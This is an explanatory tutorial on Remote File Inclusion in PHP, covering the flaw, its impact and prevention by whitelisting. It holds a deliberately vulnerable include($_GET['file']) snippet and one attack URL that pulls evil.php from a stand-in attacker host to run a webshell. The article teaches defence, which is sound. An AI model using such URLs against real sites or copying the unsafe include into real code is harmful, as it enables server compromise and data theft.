Everything About Remote File Inclusion And Prevention

I will introduce you now the attack which is also known as RFI. You will learn about its main characteristics, then I will show what is the impact it has and later on we’ll have some fun together learning how it looks like in the real examples. At the end, we will repeat it all together and find a way to fix it! Excited?

Remote File Inclusion Description

What is the first thing that comes to your mind when you read the title? Some kind of the attack which has something to do with files? Well, this kind of issue actually refers to an inclusion attack. In such kind of the crime event, the attacker is able to cause the commandment in which the web app will include a remote file. It will be done by exploiting that web app which also needs to include some external files or scripts, and all that needs to be done dynamically. Can you imagine the consequences of such successful attack? They are very serious and can even include Information Disclosure, Remote Code Execution and believe it or not XSS-that one injection we talked about already. A powerful combination, don’t you agree? The Remote File Inclusion happens most of the times when the app is receiving constantly a path to some file which must be included as the input. Of course, it is also not properly sanitized. That is why I always mention sanitizing when it comes to fixing or preventing the vulnerabilities.

Remote File Inclusion Impact

As I have already said, some very familiar and dangerous injection have been mentioned while describing RFI. It is quite enough for a person to understand what are the damages it can make. I will now explain to you how the attack here actually looks like! First, we need an attacker who is using a search engine. He or she does it know how to identify a website which contains some vulnerable content. After that, he or she is using a scanner, with which the attacker will easily come to the point to identify a website which contains some vulnerable components. Those are the first two steps, but remember that the attacker can use one way or another, or to combine them, even worse. Once he has found what he was searching for he exploits the remote file inclusion. What a vulnerability does that is uploading a backdoor shell. All in all, the results are frightening. The site is being compromised, data too, and the server is also hijacked.

Example Of Remote File Inclusion

I will explain to you how this vulnerability looks like through the example which represents the PHP that is already vulnerable to RFI.

/**

* Get a filename from a GET input

* Example – http://example.com/?file=filename.php

*/

$file = $_GET[‘file’];

/**

* Unsafely include this file

* Example – filename.php

*/

include($file);

In this example, the attacker can too make a request which I will show you now. He or she would do it with a purpose to trick the app. Then, the app will execute a malicious script (for example a webshell).

http://example.com/?file=http://attacker.com/evil.php

Among all that I have mentioned, various kinds of the attacks which are included in the RFI, I will add some more information about some little-known harms that it can do. Why would the attacker use the remote file inclusion at all? Well, because he is an attacker, right? Just kidding… He would use it to run some malicious code on the targeted server. That may be any code which contains some malicious files, and that would be run on the server. Such an action leads to complete system compromise. Can you imagine such a damage? There is also one more thing I would like you to remember, and that is how the attacker here uses RFI to run the same malicious code on clients. He can easily then manipulate the content of any response that has been sent or will be sent to that client. Stealing the client’s session cookies is nothing new among the RFI attackers.

How To Fix Remote File Inclusion

There is one best way when you want to eliminate all of the RFI vulnerabilities once they arrive (hopefully they won’t). Remember that you must avoid the dynamically including files which are always based on the user’s input. What if such an action is not even possible? Then, be sure that the app is maintaining the so-called whitelist of those files which may be included. With that step, you will be sure that you have limited the attacker’s control over what is getting included actually.

If I may admit, these attacks are getting more and more serious. What we need to do is to encounter people with them. No one needs to fear them, but know how they work to be able to stop it!